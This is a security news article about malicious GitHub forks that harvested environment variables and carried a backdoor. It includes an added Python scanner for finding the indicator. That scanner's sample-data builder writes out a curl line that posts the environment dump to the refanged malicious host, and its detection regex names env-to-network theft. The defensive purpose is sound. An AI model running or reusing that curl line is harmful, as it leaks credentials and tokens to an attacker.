Many repositories on GitHub are cloned and distribute malware

Last updated: 2022/08/05 at 11:54 PM
Security Parrot Editorial Team Published August 5, 2022
Developer Stephen Lacy stirred up the community when he announced on Twitter that he had discovered a “massive malware attack” on GitHub affecting about 35,000 repositories. It turned out, however, that neither GitHub nor the original projects had been compromised: the repositories he found were forks (copies) of legitimate projects, created specifically to distribute malware.

Lacy’s original tweet alarmed the community because it claimed that 35,000 repositories were infected with malware and that the attack touched projects in areas as well known as crypto, golang, python, js, bash, docker and k8s. Unfortunately, many people did not read past the first post; in the thread that followed, Lacy explained what was actually going on.

While forking is common practice and even encouraged among developers, in this case the attackers copied other people’s projects and injected malicious code into the copies, in order to attack unsuspecting developers who pick up a malicious clone instead of the original.

It all started when Lacy was looking into an open source project he had “found through Google” and noticed the following URL in its code: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru. A GitHub code search then turned up the same URL in more than 35,000 files across a wide variety of repositories.

Bleeping Computer journalists note that this number counts suspicious files, not infected repositories, so Lacy’s initial estimate was off: of the 35,788 search results, more than 13,000 came from a single repository, redhat-operator-ecosystem.

After Lacy’s thread, many experts set out to establish what exactly he had found. James Tucker, for example, found that the cloned repositories containing the malicious URL harvested the user’s environment variables and also carried a one-line backdoor. The attackers could therefore not only steal secrets kept in the environment, including API keys, tokens, Amazon AWS credentials and cryptographic keys, but also execute arbitrary code on the affected systems.
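The two points above, that a file count is not a repository count and that the clones combine a known indicator with an environment-dump-to-network one-liner, are easy to check on a local set of checkouts. The following scanner is an added example written for this article, not code from Lacy, Tucker or Bleeping Computer: it refangs the defanged indicator from the article for matching, applies a rough heuristic (assumed, not the real backdoor) for “collect environment variables and send them somewhere”, and reports hits per repository rather than per file. The directory names and file contents it creates are constructed sample data.

```python
import re
import tempfile
from collections import Counter
from pathlib import Path

# Indicator quoted in the article, kept defanged in source; refanged only for matching.
DEFANGED_IOC = "hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru"


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a string that can be matched in files."""
    return ioc.replace("hxxp://", "http://").replace("[.]", ".")


IOC_HOST = refang(DEFANGED_IOC).split("://", 1)[1]  # bare hostname

# Heuristic for "environment dump feeding a network call" (assumed shape, not the
# actual one-liner): an env-reading token within 200 characters of a network verb,
# in either order. re.S lets the gap span line breaks.
ENV_TO_NET = re.compile(
    r"(\benv\b|printenv|os\.environ|process\.env).{0,200}(curl|wget|requests\.|fetch\(|urlopen)"
    r"|(curl|wget|requests\.|fetch\(|urlopen).{0,200}(\benv\b|printenv|os\.environ|process\.env)",
    re.S,
)


def scan_tree(root):
    """Treat each first-level subdirectory of root as one repository checkout.

    Returns {repo_name: [relative paths of files that hit]} for repos with hits.
    """
    root = Path(root)
    hits = {}
    for repo in sorted(p for p in root.iterdir() if p.is_dir()):
        for f in sorted(repo.rglob("*")):
            if not f.is_file() or ".git" in f.parts:
                continue
            text = f.read_text(errors="ignore")
            if IOC_HOST in text or ENV_TO_NET.search(text):
                hits.setdefault(repo.name, []).append(str(f.relative_to(repo)))
    return hits


def summarize(hits):
    """Collapse file hits into per-repository counts: the distinction between
    35,000 matching files and a much smaller number of repositories."""
    per_repo = Counter({repo: len(files) for repo, files in hits.items()})
    return {"files": sum(per_repo.values()), "repos": len(per_repo), "per_repo": dict(per_repo)}


def build_sample_tree():
    """Constructed sample checkouts (not real data) mirroring the article's shape:
    one repo with the indicator vendored into many files, one clone carrying the
    one-liner, and one clean project that merely reads its own environment."""
    root = Path(tempfile.mkdtemp(prefix="fork-scan-"))
    url = refang(DEFANGED_IOC)
    bundle = root / "operator-bundle" / "vendor"
    bundle.mkdir(parents=True)
    for i in range(5):
        (bundle / f"module{i}.go").write_text(f'package m{i}\n\nconst update = "{url}/latest"\n')
    clone = root / "cloned-cli"
    clone.mkdir()
    (clone / "README.md").write_text("# cloned-cli\nA helpful tool.\n")
    (clone / "install.sh").write_text(
        "#!/bin/sh\n# constructed stand-in for the kind of one-liner the article describes\n"
        f'curl -s -X POST -d "$(env)" {url}/collect >/dev/null 2>&1\n'
    )
    clean = root / "clean-project"
    clean.mkdir()
    (clean / "main.py").write_text('import os\nprint(os.environ.get("HOME"))\n')
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    found = scan_tree(sample_root)
    for repo, files in found.items():
        print(f"{repo}: {len(files)} file(s)")
    print(summarize(found))
```

Point `scan_tree` at a directory that holds one checkout per subdirectory and read the `repos` figure, not the `files` figure, before raising an alarm; the sample tree reproduces the article’s skew, with a single repository contributing most of the file hits.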

Bleeping Computer writes that the vast majority of the clone repositories appeared within the last month (between six and twenty days before the report), although some repositories carrying malicious commits date back to 2015, meaning those were probably compromised rather than freshly cloned (with the caveat that git commit dates are set by whoever makes the commit, so an old date alone does not prove an old compromise).

The most recent commits containing the malicious URL, however, come mostly from defenders, including threat analyst Florian Roth, who published Sigma rules to detect the malicious code. Unfortunately, not everyone has caught up yet, and some GitHub users have started filing false reports against the Sigma repository, taking it for a malicious one.

According to Lacy and the journalists, GitHub has removed almost all of the malicious clone repositories from the platform over the past few hours.
